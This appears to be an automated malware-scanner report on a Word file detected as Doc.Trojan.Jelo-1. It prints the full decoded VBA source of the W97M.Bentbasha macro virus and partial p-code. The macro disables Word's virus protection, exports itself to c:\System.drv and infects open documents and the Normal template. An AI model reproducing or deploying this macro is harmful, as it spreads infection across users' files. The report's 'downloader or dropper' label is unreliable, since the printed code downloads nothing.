MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro that executes code using the Shell() function. This macro attempts to export its code to 'c:\System.drv' and then execute 'notepad.exe' with a hardcoded message, indicating a downloader or dropper functionality. The ClamAV detection of 'Doc.Trojan.Jelo-1' further supports its malicious nature.
Heuristics 5
-
ClamAV: Doc.Trojan.Jelo-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Jelo-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4900 bytes |
SHA-256: 843238e47a9c4802aad5a9fc2508299d9ba78798c7654a5f02accbf49fc7d4e7 |
|||
|
Detection
ClamAV:
Doc.Trojan.Jelo-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Bentbasha
Private Sub Document_New(): Document_Close: End Sub
Private Sub Document_Open(): Document_Close: End Sub
Private Sub Document_Close(): On Error Resume Next: c = c + 1
Word.Options.VirusProtection = False
Word.Application.EnableCancelKey = wdCancelDisabled
Word.ActiveDocument.ReadOnlyRecommended = False
Word.ShowVisualBasicEditor = False
If Dir("c:\Windows\Acaid32.drv") <> "Acaid32.drv" Then
Set vtijelo = ThisDocument.VBProject.VBComponents(c)
vtijelo.Export ("c:\System.drv")
End If
For t = 1 To Word.Documents.Count
Set f = Word.ActiveWindow.Document.VBProject.VBComponents(t).CodeModule
If f.lines(c, c) <> "'Bentbasha" Then
f.deletelines c, f.countoflines
f.AddFromFile "C:\System.drv"
f.deletelines 1, 4
End If
Next
For g = 1 To Word.Templates.Count
Set n = Templates(1).VBProject.VBComponents(1).CodeModule
If n.lines(1, 1) <> "'Bentbasha" Then
n.AddFromFile "c:\system.drv"
n.deletelines 1, 4
End If
Next
If Day(Now()) = 7 Then
app = Shell(notepad.exe, vbNormalFocus)
SendKeys "Nazalost, Vas kompjuter je inficiran sa W97M.Bentbasha by e[ax] / SpeciesVL!", 0
AppActivate (app)
End If
End Sub
'WM.Bentbasha by e[ax]
' Processing file: /opt/analyzer/scan_staging/fc8ae019179c43cb8cd3127ba33fc7e6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4725 bytes
' Line #0:
' QuoteRem 0x0000 0x0009 "Bentbasha"
' Line #1:
' FuncDefn (Private Sub Document_New())
' BoS 0x0000
' ArgsCall Document_Close 0x0000
' BoS 0x0000
' EndSub
' Line #2:
' FuncDefn (Private Sub Document_Open())
' BoS 0x0000
' ArgsCall Document_Close 0x0000
' BoS 0x0000
' EndSub
' Line #3:
' FuncDefn (Private Sub Document_Close())
' BoS 0x0000
' OnError (Resume Next)
' BoS 0x0000
' Ld c
' LitDI2 0x0001
' Add
' St c
' Line #4:
' LitVarSpecial (False)
' Ld Word
' MemLd Options
' MemSt VirusProtection
' Line #5:
' Ld wdCancelDisabled
' Ld Word
' MemLd Application
' MemSt EnableCancelKey
' Line #6:
' LitVarSpecial (False)
' Ld Word
' MemLd ActiveDocument
' MemSt ReadOnlyRecommended
' Line #7:
' LitVarSpecial (False)
' Ld Word
' MemSt ShowVisualBasicEditor
' Line #8:
' LitStr 0x0016 "c:\Windows\Acaid32.drv"
' ArgsLd Dir 0x0001
' LitStr 0x000B "Acaid32.drv"
' Ne
' IfBlock
' Line #9:
' SetStmt
' Ld c
' Ld ThisDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' Set vtijelo
' Line #10:
' LitStr 0x000D "c:\System.drv"
' Paren
' Ld vtijelo
' ArgsMemCall Export 0x0001
' Line #11:
' EndIfBlock
' Line #12:
' StartForVariable
' Ld t
' EndForVariable
' LitDI2 0x0001
' Ld Word
' MemLd Documents
' MemLd Count
' For
' Line #13:
' SetStmt
' Ld t
' Ld Word
' MemLd ActiveWindow
' MemLd Document
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set F
' Line #14:
' Ld c
' Ld c
' Ld F
' ArgsMemLd lines 0x0002
' LitStr 0x000A "'Bentbasha"
' Ne
' IfBlock
' Line #15:
' Ld c
' Ld F
' MemLd countoflines
' Ld F
' ArgsMemCall AddFromFile 0x0002
' Line #16:
' LitStr 0x000D "C:\System.drv"
' Ld F
' ArgsMemCall norm 0x0001
' Line #17:
' LitDI2 0x0001
' LitDI2 0x0004
' Ld F
' ArgsMemCall AddFromFile 0x0002
' Line #18:
' EndIfBlock
' Line #19:
' StartForVariable
' Next
' Line #20:
' StartForVariable
' Ld _B_var_g
' EndForVariable
' LitDI2 0x0001
' Ld Word
' MemLd n
' MemLd Count
' For
' Line #21:
' SetStmt
' LitDI2 0x0001
' LitDI2 0x0001
' ArgsLd n 0x0001
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set _B_var_n
' Line #22:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld _B_var_n
' ArgsMemLd lines 0x0002
' LitStr 0x000A "'Bentbasha"
' Ne
' IfBlock
' L
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.